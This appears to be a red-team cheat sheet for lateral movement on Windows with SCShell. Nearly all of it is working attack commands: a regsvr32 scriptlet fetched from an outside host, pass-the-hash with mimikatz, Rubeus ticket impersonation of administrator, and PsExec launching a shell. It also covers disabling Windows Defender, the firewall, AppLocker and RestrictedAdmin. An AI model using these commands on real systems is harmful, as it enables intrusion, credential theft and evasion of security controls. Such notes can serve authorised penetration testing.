### scshell -> fileless; uses sc to launch the payload as a remote service

```
scshell.exe jump09 spoolss "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i:http://192.168.49.57:8080/gvOUbx24m.sct scrobj.dll" .   // worked
scshell.exe file01 SensorService "C:\windows\system32\cmd.exe /c echo 1 > c:/2.txt" .
scshell.exe file01 SensorService "C:\windows\system32\cmd.exe /c \\192.168.49.57\test\hw.exe" .
scshell.exe file01 SensorService "C:\windows\system32\cmd.exe /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" /v AllowInsecureGuestAuth /d 00000001 /f /t REG_DWORD" .
scshell.exe file01 SensorService "C:\windows\system32\cmd.exe /c "C:\Program Files\windows defender\mpcmdrun.exe" -RemoveDefinitions -All" .
```

```
python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde01756
or
sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe
```

#### temp

```
Rubeus.exe s4u /user:myComputer1$ /rc4:AA6EAFB522589934A6E5CE92C6438221 /impersonateuser:administrator /msdsspn:CIFS/jump009.ops.compiy.com /ptt
PsExec64.exe \\jump009.ops.compiy.com cmd.exe

"C:\Program Files\windows defender\mpcmdrun.exe" -RemoveDefinitions -All

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" /v AllowInsecureGuestAuth /d 00000001 /f /t REG_DWORD
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

netsh advfirewall set allprofiles state off

sc stop appid
sc stop appidsvc
sc stop applockerfltr
sc.exe config applockerfltr start=demand
sc.exe config appid start=demand
sc.exe config appidsvc start=demand
```

### shell

```
PsExec64.exe \\file01 -accepteula "c:\users\public\shell.exe"
```

### References

```
https://github.com/Mr-Un1k0d3r/SCShell
```